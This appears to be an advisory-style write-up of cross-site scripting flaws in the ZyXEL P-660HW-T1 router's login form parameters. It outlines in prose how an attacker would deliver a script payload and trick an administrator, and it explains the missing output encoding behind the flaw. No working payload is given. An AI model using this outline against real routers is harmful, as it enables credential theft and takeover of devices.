Multiple cross-site scripting (XSS) vulnerabilities in Forms/rpAuth_1 on ZyXEL P-660HW-T1 2 devices with ZyNOS firmware 3.40(AXH.0) allow remote attackers to inject arbitrary web script or HTML via the (1) LoginPassword or (2) hiddenPassword parameter.
Critical vulnerability exists in ZyXEL P-660HW-T1 2 routers running ZyNOS firmware 3.40(AXH.0), allowing remote attackers to execute arbitrary code through cross-site scripting (XSS) attacks. Successful exploitation could lead to complete compromise of the router and potentially the network it protects, enabling attackers to steal credentials, redirect traffic, and launch further attacks.
Step 1: Payload Delivery: The attacker crafts a malicious URL containing a JavaScript payload within the LoginPassword or hiddenPassword parameter. This payload could be a simple <script> tag or a more complex script designed to steal credentials, redirect traffic, or perform other malicious actions.
Step 2: User Interaction: The attacker tricks a user, typically an administrator, into accessing the malicious URL. This could be achieved through phishing, social engineering, or other means.
Step 3: Payload Execution: When the user's browser loads the router's web interface, the injected JavaScript payload is executed. The browser interprets the injected code as part of the legitimate web page.
Step 4: Attack Execution: The injected JavaScript executes the attacker's desired actions. This could include stealing cookies, redirecting the user to a phishing site, or modifying the router's configuration to grant the attacker unauthorized access.
The vulnerability stems from insufficient input validation and output encoding within the Forms/rpAuth_1 component of the ZyNOS firmware. Specifically, the LoginPassword and hiddenPassword parameters are vulnerable to XSS. The web application fails to properly sanitize user-supplied input before rendering it in the HTML response. This allows attackers to inject malicious JavaScript code into these parameters, which is then executed by the victim's web browser when they access the router's web interface. The lack of proper input validation and output encoding (e.g., HTML entity encoding) is the root cause. The application trusts user-supplied data without verifying its safety, leading to the execution of attacker-controlled scripts. The vulnerable code likely directly incorporates the user-provided password into the HTML response without escaping special characters like < and >.